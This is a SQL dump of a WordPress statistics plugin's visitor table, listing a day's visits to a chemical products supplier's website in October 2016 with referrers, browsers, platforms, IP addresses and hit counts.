INSERT INTO `wp_statistics_visitor` VALUES (1197, '2016-10-07', 'https://www.miller-stephenson.com/chemical-products/', 'Safari', 'iPhone', '10.0', '', '223.38.62.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1198, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Safari', 'iPhone', '10.0', '', '223.39.191.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1199, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/', 'Safari', 'iPhone', '10.0', '', '223.38.63.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1200, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '31.193.51.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1201, '2016-10-07', 'https://www.seeingmeerkat.com/', 'MSIE', 'Windows', '6.0', '', '37.115.187.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1202, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6', '', '163.172.14.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1203, '2016-10-07', 'https://www.google.es/', 'Chrome', 'Windows', '53.0.2785.143', '', '195.81.34.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1204, '2016-10-07', 'https://uwestech.com.sg/index.php?route=product/product&product_id=53', 'Firefox', 'Windows', '49.0', '', '185.24.187.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1205, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '72.142.116.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1206, '2016-10-07', 'https://www.google.com.tr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwimvqemvMjPAhUDuRQKHTUFCk0QFghFMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-826%2F&usg=AFQjCNHj0G0zfOGbw4615b838lZaXvqHvA&sig2=GF2r68tcsilJmzt7FDZW7g&bvm=bv.134495766,bs.1,d.bGg', 'MSIE', 'Windows', '11.0', '', '24.133.207.156', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1207, '2016-10-07', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '151.237.184.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1208, '2016-10-07', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '151.237.184.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1209, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '37.0.2062.120', '', '89.120.245.206', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1210, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '208.94.226.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1211, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '82.45.170.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1212, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '204.124.196.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1213, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.143.178.97', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1214, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1215, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.41', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1216, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.9', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1217, '2016-10-07', 'https://1-free-share-buttons.com', 'Chrome', 'Windows', '36.0.1985.143', '', '187.11.222.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1218, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '52.43.242.117', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1219, '2016-10-07', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '87.127.117.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1220, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&sqi=2&ved=0ahUKEwi1qZKDxcjPAhVGVWMKHUg0A60QjBAIJDAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fcontact.html&usg=AFQjCNH7LlH9SlS1INDYkmHx7fXxmFUSLA&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '63.69.68.5', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1221, '2016-10-07', 'https://www.google.ro/', 'Chrome', 'Windows', '53.0.2785.143', '', '5.2.190.229', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1222, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '113.80.169.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1223, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1224, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.116', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1225, '2016-10-07', 'https://www.miller-stephenson.com', 'Dalvik', 'Android', '2.1.0', '', '63.227.212.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1226, '2016-10-07', 'https://www.google.fr/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.252.210.129', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1227, '2016-10-07', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjT3vy5ysjPAhUWG4EKHY95AZIYABAA&sig=AOD64_0hQb4hP8lSJuM4If5jAHoth4gojg&rct=j&q=&ved=0ahUKEwjy_ve5ysjPAhVDRCYKHTPgAEwQ0QwIew&adurl=', 'MSIE', 'Windows', '11.0', '', '99.3.2.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1228, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '600.1.4', '', '69.77.249.103', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1229, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1230, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1231, '2016-10-07', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjk_Z_f0MjPAhUIAxoKHfOGCCcQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '82.100.239.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1232, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 1201, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1233, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '125.209.235.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1234, '2016-10-07', 'https://www.miller-stephenson.com', 'Microsoft', 'Unknown', 'Unknown', '', '192.100.100.215', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1235, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '192.100.100.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1236, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.100.100.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1237, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1238, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.247.230.158', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1239, '2016-10-07', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1240, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '91.234.226.18', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1241, '2016-10-07', 'https://www.google.com.ar/', 'Chrome', 'Android', '53.0.2785.124', '', '201.235.162.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1242, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-bd-series/', 'Chrome', 'Windows', '53.0.2785.143', '', '186.220.13.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1243, '2016-10-07', 'https://www.google.co.uk/url?sa=t&source=web&cd=1', 'Chrome', 'Linux', '46.0.2490.80', '', '104.236.83.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1244, '2016-10-07', 'https://www.google.co.za/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwi6h7Sn1cjPAhUKI8AKHSVJC10QFgg0MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FCuring%2520Agent.pdf&usg=AFQjCNHxwVqX5A1fMEHEn-MeptfpRg-BrQ', 'MSIE', 'Windows', '11.0', '', '196.30.86.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1245, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.148.36.25', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1246, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwif27OO1sjPAhXIOiYKHd_NA7YQFggkMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-122AD.pdf&usg=AFQjCNEHYvrBDicFr_0ThYtNVdYZMxT3lA&sig2=WxZB0KSMzHjiObVLfJMxEQ', 'MSIE', 'Windows', '11.0', '', '67.76.111.174', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1247, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '204.14.185.160', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1248, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '54.85.38.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1249, '2016-10-07', 'https://www.miller-stephenson.com/product/releasys-8800/', 'Safari', 'iPhone', '10.0', '', '24.63.154.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1250, '2016-10-07', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi13vOB2MjPAhXCWBoKHSMVAkoQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=CdNSaQQm-5W1BhHXdB92fQ', 'MSIE', 'Windows', '11.0', '', '141.170.11.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1251, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjR8aWQ2MjPAhUEJCYKHWMdAHsQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '12.197.28.228', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1252, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '162.118.16.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1253, '2016-10-07', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '149.5.116.254', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1254, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.173.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1255, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1256, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1257, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwim6cH328jPAhXC6IMKHff7DngQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fepoxy.html&usg=AFQjCNFuTusE0h7s-xX47AvEIcg0IZr4og&bvm=bv.134495766,bs.1,d.eWE', 'MSIE', 'Windows', '11.0', '', '192.249.47.206', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1258, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1259, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.11.4.30', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1260, '2016-10-07', 'https://www.bing.com/search?q=KRYTOX+GPL+225&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '194.74.198.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1261, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '39.0', '', '195.22.127.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1262, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.150.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1263, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '174.47.212.222', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1264, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.236.134.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1265, '2016-10-07', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1266, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwilpvqT48jPAhXM4IMKHQqdBPIQjBAIKzAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2F&usg=AFQjCNG9rxN-loo47flpbq4TFJUAtJ1HDg&sig2=FLhJRITebcbjfXFaoh8aWw&bvm=bv.135258522,d.amc', 'MSIE', 'Windows', '11.0', '', '167.232.248.15', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1267, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1268, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.33.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1269, '2016-10-07', 'https://www.google.pt/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiOoa3v48jPAhWD8RQKHTRHBgsQFggvMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-105%2F&usg=AFQjCNE7fDUZYvw1vi_-WJ_5lLxrv9GE4g&sig2=nZ_nCGI5evh7okMjzU5GxA', 'MSIE', 'Windows', '11.0', '', '89.214.235.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1270, '2016-10-07', 'https://www.google.pt/', 'Chrome', 'Windows', '53.0.2785.143', '', '85.244.87.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1271, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '66.195.173.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1272, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiO7Y7s48jPAhVRgSYKHXOjDRYQFggqMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Frelease_agents.html&usg=AFQjCNEtml3Wnf9B2NvctrDFppdhnpqPXA', 'MSIE', 'Windows', '11.0', '', '10.35.7.56', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1273, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '94.127.83.40', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1274, '2016-10-07', 'https://duckduckgo.com/', 'Firefox', 'Windows', '49.0', '', '67.133.81.166', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1275, '2016-10-07', 'https://www.google.com/aclk?sa=L&ai=DChcSEwja-7mo6MjPAhWEJIEKHR9sBkkYABAF&sig=AOD64_220y_yQ4xEFwbK4rDgKgqgvJE5sg&rct=j&q=&ved=0ahUKEwiEi7ao6MjPAhVHQSYKHZ4aDVYQ0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '24.119.244.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1276, '2016-10-07', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '42.236.10.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1277, '2016-10-07', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '42.236.10.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1278, '2016-10-07', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '9.20', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1279, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '63.142.48.40', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1280, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1281, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1282, '2016-10-07', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '53.0.2785.124', '', '107.222.194.208', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1283, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1284, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1285, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '176.212.192.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1286, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.17.223.178', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1287, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '64.33.177.139', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1288, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.23', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1289, '2016-10-07', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '172.219.56.134', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1290, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '166.137.244.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1291, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '70.60.193.86', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1292, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '209.220.54.212', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1293, '2016-10-07', 'https://www.google.ch/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiq6_To7cjPAhXH6xQKHRixBkgQFggqMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,bs.1,d.d2s', 'MSIE', 'Windows', '11.0', '', '193.5.216.100', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1294, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.70.74.226', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1295, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1296, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '54.164.124.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1297, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1298, '2016-10-07', 'https://www.miller-stephenson.com/product/epon-1007f/', 'MSIE', 'Windows', '9.0', '', '204.79.180.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1299, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '45.32.130.87', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1300, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11', '', '98.177.179.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1301, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '45.32.129.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1302, '2016-10-07', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiUrrrG8MjPAhUTG4EKHTa_AOYYABAF&sig=AOD64_1A5golTiW_PsgFvLal8_u0L4Qv8g&rct=j&q=&ved=0ahUKEwjRnLfG8MjPAhWIVz4KHQ26CDwQ0QwIbQ&adurl=', 'MSIE', 'Windows', '11.0', '', '204.27.156.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1303, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '128.115.190.32', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1304, '2016-10-07', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjh3tLm8cjPAhWPgGkKHQs6C_EYABAA&sig=AOD64_0fS9fA_6RmxENGxkidQ5L8VyxASw&rct=j&q=&ved=0ahUKEwjTyc_m8cjPAhWU8oMKHVXFCykQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '24.222.37.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1305, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.202.248.92', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1306, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1307, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiPtMql8sjPAhXCXR4KHbFrAmMQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.dmo', 'MSIE', 'Windows', '11.0', '', '152.178.51.65', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1308, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '107.77.64.78', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1309, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '184.95.51.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1310, '2016-10-07', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.8.0', '', '80.61.57.89', '000', 56, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1311, '2016-10-07', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '73.233.101.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1312, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '173.164.1.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1313, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/epikure-curing-agents/epikure-w-composites/', 'Safari', 'iPhone', '7.0', '', '199.30.24.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1314, '2016-10-07', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '130.75.38.72', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1315, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1316, '2016-10-07', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1317, '2016-10-07', 'https://www.bing.com/search?q=steven+and+son++chemical+company+&go=Search&qs=bs&form=QBRE', 'BlackBerry Browser', 'PlayBook', '7.2.1.0', '', '104.244.230.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1318, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1319, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '115.115.139.174', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1320, '2016-10-07', 'https://www.google.co.uk/', 'Edge', 'Windows', '14.14393', '', '195.11.226.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1321, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1322, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '76.240.27.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1323, '2016-10-07', 'https://www.miller-stephenson.com/product/krytox-gpl-226/', 'MSIE', 'Windows', '9.0', '', '204.79.180.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1324, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.73.72.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1325, '2016-10-07', 'https://mschem.com/robots.txt', 'Chrome', 'Macintosh', '34.0.1847.131', '', '104.236.239.159', '000', 1, 0); 
